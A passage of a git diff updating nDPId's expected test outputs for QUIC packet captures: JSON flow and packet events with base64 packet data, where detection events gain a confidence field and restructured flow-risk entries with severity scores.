qkBU4R9jqpVrYVbPT8wKh4QURdyUCFt\/pHVUDNOCdVrd5eUzcIKHKZaxSHePl\/yg\/dZfocdFhjXr+U733uYE1qFz548naI9j5KWFQR98\/CC0d0xoU88iMdiNfsuKpNx+0KTTooTNyU1vveYbCXzokTytLPjCvSa6G73TOvA8OuYqiUHp5xIaLnG3yNhVMDOSMhU4ie3r+DP28Mq2ZWhXb0gV907Zpx+KmY7qFE\/EyWPTw3ImggsMZOsPVzlV7KQ1G4JHZysWOpvVXcKqSK+UITOAxHamfF+pVJDkIieo\/+UVkfaWKxIvKYp+6AyW0mR91ijnCBWiv5ac8EelQBTEUMESmN3gff7jVmyD2UBGfExJI\/xp8zNyXaLaoqKwUf+CQdXZyTUzSEow4dw7sk0BLa4e20TxielSByZoWK6tkiltlUP4PBd1obZ\/M6oWg61j\/Daa8BtIg2NiKd6C8GmB4wD3HxshTAfK8yQQvtfE5oxhIYFSThvUihWT5Y6+DXgFo1pfhCLK9GiUczfLb4IIj1ohvX7+JFC3tCZNhvBg+W6VXr0O0KDoohneIAR1gneA0NH\/AqiCjy6uumlwR0QPW6m1\/qhFdEihzIt7lXZBU1C0s3xSiecNioN1nHQ1IZ18Gt5IO0O8fCyaWkwQJW2X4b7oYB71jM09PZ6yTEheWWX1Z9OGLrj2qcJloTu4Iu57B9axJ4rPb3iaYEijb13CtYJyBrdekXWhtaBsDUZ4K3VnApYE2uwbNJjLuophjh1jHU6UaDW7ICUdFlFfXOXD9zV29thx80\/DmDnUWBkCiYZ1b8WkeGSDocv3+HJQsgn59EUwVtn48xiKxF+ZxbEyvE+tNMsZmJsKYtblFc78KHscbC\/gXOqIss94XJoPcOEnYS4XkfqkmrgcV+OcOn4xwAQZnZuvWtmECInLRRqZSWSgrK5WL3PY0tP7MwsjMj84o6wBnMP4w3HV50+mH8pwYFK7mbzXOSQewpeHcDSLhnLJws7lK12ciTf9mDIIAvKBV\/tMkKkPxyJSEhm3jO7hS51vQnfnfkpRwdX7SiobX4njfsJlhehzLkqQw51jymiTpszSbAlctrbxZEyzfIc2WNWTUWx08ydtAwlnqeB3Do2MRGROWmPmTwZQao5kKTElIMYU3ySnnob2SxJIk9zX7GT64JhQ8ACYfYm+EIsGpdwABuXDGAru+RAc6pHR7G9TKS2nV6aLuss2\/KhvADWzMAzwYWr8elV6VWYH9TDqVGswk9u\/66exfYVBSjIRj5MhRdx3Wo5x2vsIYtvcbxtp7Mbnc9AhThDmqqwywGPlZW7atDcUp1UHbpIe7lydp\/rxXfp2pJnL4sHu4B5+Vosg=="}
-00748{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"quic-v2-00.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1637834659980,"flow_last_seen":1637834659987,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":26333,"flow_avg_l4_payload_len":877,"midstream":0,"ts_msec":1637834659987,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.198","src_port":50277,"dst_port":4443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port","24":"SNI TLS extension was missing"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00937{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"quic-v2-00.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1637834659980,"flow_last_seen":1637834659987,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":26333,"flow_avg_l4_payload_len":877,"midstream":0,"ts_msec":1637834659987,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.198","src_port":50277,"dst_port":4443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
 00160{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":30,"source":"quic-v2-00.pcapng","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 30/30
@@ -14,9 +14,9 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4601273 bytes
-~~ total memory freed........: 4601273 bytes
-~~ total allocations/frees...: 99595/99595
+~~ total memory allocated....: 4686226 bytes
+~~ total memory freed........: 4686226 bytes
+~~ total allocations/frees...: 101185/101185
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 165 chars
 ~~ json string max len.......: 2135 chars
diff --git a/test/results/quic.pcap.out b/test/results/quic.pcap.out
index ba6c3cdfd..b411ee674 100644
--- a/test/results/quic.pcap.out
+++ b/test/results/quic.pcap.out
@@ -1,39 +1,39 @@
 00436{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"quic.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431155536815,"flow_last_seen":1431155536815,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1431155536815,"l3_proto":"ip4","src_ip":"192.168.1.109","dst_ip":"216.58.212.101","src_port":57833,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02234{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1431155536815,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1431155536815,"pkt":"ZHACjT05eJKcD6iOCABFAAViHYdAAEARqU7AqAFt2DrUZeHpAbsFTjSmDbLeXfFPVUXrUTAyNAE7bomG+Dzzt6arXQUBoAEABENITE8YAAAAUEFEAIcBAABTTkkAlgEAAFNUSwDQAQAAVkVSANQBAABDQ1MA5AEAAE5PTkMEAgAATVNQQwgCAABBRUFEDAIAAFVBSUQkAgAAU0NJRDQCAABUQ0lEOAIAAFBETUQ8AgAAU1JCRkACAABJQ1NMRAIAAFBVQlNkAgAAU0NMU2gCAABLRVhTbAIAAENPUFRsAgAAQ0NSVIQCAABDR1NUiAIAAElSVFSMAgAAQ0VUVjADAABDRkNXNAMAAFNGQ1c4AwAALS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLW1haWwuZ29vZ2xlLmNvbT0+v6ewgcRvrlDFl4IgCKBtLSXVw73kkvbSDmvcmOf2TBMxulvrGz8yGTFdF5jLNEfrxdDYlT46wVhRMDI0OZ\/5U0D3\/sl7Junn5Fxx\/1VNs1C1kCtxr0CV9UPILNoJ6w2heNOu0THXmZnbqXjfZAAAAEFFU0diZXRhIENocm9tZS80My4wLjIzNTcuNDWSgFuKS9buSt4mHNzF5UW8AAAAAFg1MDkAAAQAHgAAALUiugwS5Xe6lV7+35SrDjhQNi2XDPMM\/SAa6745q60xAQAAAEMyNTWyymQS2aTzwxJH\/U1CkeUIQAt7kKmueetRQklDOGABACXmg4KWna0TB6ed5h20iLVA1zTe0FGDOptzFKaIlVwv9K6LN7uMdA4zwVZIB1iByXkmIDPeaAjR8KDHiEXiLMdlilnNIxXrsf36+nSmAywD99MMia5QSojDYPQnkx\/kpc2+WkgLuTD7x6JugKntVJ0OcgBRa3ZbeaVzbIzXT9DutsK0zdmFTlT7PzF\/1Y0KupYf9uk4kqnlGvQLoUuyyKbFovu6AACgAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00715{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431155536815,"flow_last_seen":1431155536815,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1431155536815,"l3_proto":"ip4","src_ip":"192.168.1.109","dst_ip":"216.58.212.101","src_port":57833,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.GMail","breed":"Acceptable","category":"Email"},"quic": {"client_requested_server_name":"mail.google.com","user_agent":"beta Chrome\/43.0.2357.45"}}
+00741{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431155536815,"flow_last_seen":1431155536815,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1431155536815,"l3_proto":"ip4","src_ip":"192.168.1.109","dst_ip":"216.58.212.101","src_port":57833,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GMail","breed":"Acceptable","category":"Email"},"quic": {"client_requested_server_name":"mail.google.com","user_agent":"beta Chrome\/43.0.2357.45"}}
 01022{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1431155536861,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":478,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":478,"pkt_l4_len":444,"ts_msec":1431155536861,"pkt":"ZHACjT05eJKcD6iOCABFAAHQHY9AAEARrNjAqAFt2DrUZeHpAbsBvNDyDbLeXfFPVUXrUTAyNAKdxuQD3gljSLhQUOfLRbUHNhGyhVA9b2u4w1RW9E4SCZCpycMJZccQCIwgTfygJ\/6u\/OxyXHQ8t9GsIUVpGN5BSEz\/EaopIjzG0oey+J14dhVaQT5clZ4hX2alMKUnKCpX2UHp8k4gIBE+BTaDbhx4sVltZ3YRbFd1slVBcwxCCDis9hGoXWyhcUU9TpSCvPXqyDIBYGsw8hGUNxjvWcC36dLiKPlQ1A++VHlkjzGxGsfgIrij15t0O6lgXxVbA\/HpW3G2ebAmsKraKCAnkkUtJl3AOI\/J2OljPOJ8ybsb8ihq0NT5yt7I6jw60az5CR6QV4lZS\/t+fQsKeKH0MrEQhH3b6f+BZUKI9uikSR4hfQxA8xYeMMFcn\/fjScjPTaUqPoQqgHKJPMZAaJaOIXR\/06t5\/mWN79wAQ5uIfj\/sSvnF2vA+Wg+Ct+7u2iMK\/1hOAY0\/EO0phnuWYuhnxN7rmjjYiKKpzjb+WYnzCHocgbS6q4u8VmchP8qd2Emms7CkStzYV\/CAUZKEnfSvajU\/RaVfjhz9giNrW3Dr5B1Mu7zIwMFBEg=="}
 02254{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1431155536876,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1431155536876,"pkt":"eJKcD6iOZHACjT05CABFAAVi+w8AADYRFcbYOtRlwKgBbQG74ekFTrySAAED7yXOnwe7pFDDfekcKJR3Jy2sqO+OrEMBkrmlA5460PLSsQWLxQP3oiY5d8U9vyThqGCVEM5n\/b30dAd2DjWMikTcCyMma2f07JhYHF3MMGVgNWOe6MGYINMPJ609w8TfRzFDXO2Hv3Rd+Io3\/xrzZn4oPs6zhHI1yq2C3Bu04kRZDHQePoRj30\/8HvjxNKB4JiKyE+zKdMREBQ3JOi\/Z6sOIMbX9akogkYpnl7ng6wuSDWdU0O6S17QqQ\/PZNbWcKj10ybS4iwVQA0f8amB7S9uZIaouXNiBUNnVoBkvwUNJHLfYTkO7Lcrh9\/y6VuU0sUqC5BwPmW+2ikCeMngUD1xHT1Lx5xcuKKpYgNXg5fiz8miFT9HCjdjO6B4AMX2tdmMxafKWE\/OE83wkxbiDjermaqDLFN43iZrsa77dngVKSa0JOoliFCpsBQc+8MPNJciywBt2F7RgKowH2h+9Qk9ORQtDAbuXMpSiJJWSUWGURbG9ZouMcFzy3aCPhH9WEaiDxSqv5bG1C+4++Ap3JmLZGydHT1SxVwfUUCxHryOH1SJLcVb8wYjogx1ZyV2hUKKGb\/LTkrzKQgQmaow0b30+zmXo8EqAqNi+pbkwMCjRuhbpSGWkDycL5nwxuP9Ml3fkw+Nua2MwUp0EfcBQbRU9wNgqxQ9uJseySfgLNd277XFk6kBsEbZHLkwoqVC16i6UXqO9Bq9Qa6OSE4HmTd0ZK\/TJwTkvyZH7HArDOO\/IcXlmUhCYygfBL2Q5ZpNExxrN9hs9fyUTlDAy\/fKVbi1DmTvb8UQ08IKIHR88Yq94i78i11E4Ck+d\/mt1HMNvsgPj2pD+djmLPe2eSTH37Jk2vmFRiqCOpbpsl49D\/VP3D6Iqy69k4ASDn2RRISJtJTG3B4eSG0UcIyl51iCsWhHCXqo+IYYFVP5DZZddk8U1w9uBnJXeOg1TXZTOMI0ol6bS146IgKA69vbLEVfalKBSuGdHvDKyOMSnLak5kQ2gF6fQS9y3naenu5fopH54EXjO3jjfmTVJmGvZC\/P1NiZtWEgaqDhB2DugL5t17Tc3VwmJfqg+3eAVYWabEKtkMdIl3iArLACUUBNCZz1HkomKYV+WYy79+d13Y8v1fzFaFyLLqqM4eyurBPDRG\/+y1oiSpL+pmxwnbgxI3utzVErOYH+5lhn82g\/+Ii+SkdpS0RH4VCbqV\/v0Y4Y5Od4xYJhouL7GcBe5gBVDLL2wvDGN\/2TxDwPjLE+A3+O2Fa4G5F\/+gjnrsB0wdiL\/ilvOHsRXVpnfbw+QbFdGjFQzBh00mHjlv+hyldAVX6DRrmAyZqfHl4R8DYS3AwjxssPWDwDtSUMlQQpikBERZ9MMlFb4xTKRR\/wBi8a8Irtzx\/kIza\/1v2NJPtS13JBH+AEVAHqIKkeVWhalz8eieG0tc75G2spbagtiyakNL\/rq+i0PePLukIW0MDDsvi7O7dn\/0fwGspoErTl6j3PKwj7+sTyyEqAVRQx1M7OB+kmMDRumZ6Ct9DotkVa72qOqLha\/8xxMPobKOFlHa3535yRdBIpdRmga9bEYopLGGzkYHAzAiGpiXAo7oYF9gbpS7a5ciOCtFbOspMqjc6us7YE1Fk9eZR8mOK3nE7WlV4miQCj5Ye\/jSzjCwJgC1JXYSzigmV7HoFUEa9032KRB3TfddhJ9qY+MTGbbTrJ2h+zE2tLE+GlMJ43i68EjkXl4FQgRWpuP1j6L9IzE9WrKG1pRl60aGD77YrqqhZeBKTB3VaLzjU5uW3RnvxwpEMU20qKXXlS1"}
-00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":414,"source":"quic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":413,"flow_first_seen":1431155536815,"flow_last_seen":1431155574747,"flow_idle_time":180000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":237528,"flow_avg_l4_payload_len":575,"midstream":0,"ts_msec":1461850699450,"l3_proto":"ip4","src_ip":"192.168.1.109","dst_ip":"216.58.212.101","src_port":57833,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC.GMail","breed":"Acceptable","category":"Email"}}
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":414,"source":"quic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":413,"flow_first_seen":1431155536815,"flow_last_seen":1431155574747,"flow_idle_time":180000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":237528,"flow_avg_l4_payload_len":575,"midstream":0,"ts_msec":1461850699450,"l3_proto":"ip4","src_ip":"192.168.1.109","dst_ip":"216.58.212.101","src_port":57833,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GMail","breed":"Acceptable","category":"Email"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":414,"source":"quic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1461850699450,"flow_last_seen":1461850699450,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1461850699450,"l3_proto":"ip4","src_ip":"10.0.0.4","dst_ip":"10.0.0.3","src_port":40134,"dst_port":6121,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02231{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":414,"source":"quic.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1461850699450,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1461850699450,"pkt":"OGO7P47K7LHXhMJyCABFAAViImxAAEAR\/xgKAAAECgAAA5zGF+kFThlmCfresOVX5pKgUTAzMwHak8zsp30I9q698IIAoAEUBUNITE8NAAAAUEFEAEwEAABWRVIAUAQAAENDUwBgBAAATVNQQ2QEAABQRE1EaAQAAElDU0xsBAAAQ1RJTXQEAABOT05QlAQAAFNDTFOYBAAAQ1NDVJgEAABDT1BUnAQAAENGQ1egBAAAU0ZDV6QEAAAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLVEwMzN7Junn5Fxx\/wHogWCSkhroZAAAAFg1MDlYAgAASxIiVwAAAADS+1vXZRZzJ1+rqmPJtznpSW1g7BCg2rfC01sXLNMkHQEAAABGSVhEAEAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00704{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":414,"source":"quic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1461850699450,"flow_last_seen":1461850699450,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1461850699450,"l3_proto":"ip4","src_ip":"10.0.0.4","dst_ip":"10.0.0.3","src_port":40134,"dst_port":6121,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","24":"SNI TLS extension was missing"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":414,"source":"quic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1461850699450,"flow_last_seen":1461850699450,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1461850699450,"l3_proto":"ip4","src_ip":"10.0.0.4","dst_ip":"10.0.0.3","src_port":40134,"dst_port":6121,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 02231{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":415,"source":"quic.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1461850699600,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1461850699600,"pkt":"OGO7P47K7LHXhMJyCABFAAViIotAAEAR\/vkKAAAECgAAA5zGF+kFThlmCfresOVX5pKgUTAzMwKbXvfkbQpZgkUtS3wAoAEUBUNITE8NAAAAUEFEAEwEAABWRVIAUAQAAENDUwBgBAAATVNQQ2QEAABQRE1EaAQAAElDU0xsBAAAQ1RJTXQEAABOT05QlAQAAFNDTFOYBAAAQ1NDVJgEAABDT1BUnAQAAENGQ1egBAAAU0ZDV6QEAAAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLVEwMzN7Junn5Fxx\/wHogWCSkhroZAAAAFg1MDlYAgAASxIiVwAAAADS+1vXZRZzJ1+rqmPJtznpSW1g7BCg2rfC01sXLNMkHQEAAABGSVhEAEAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
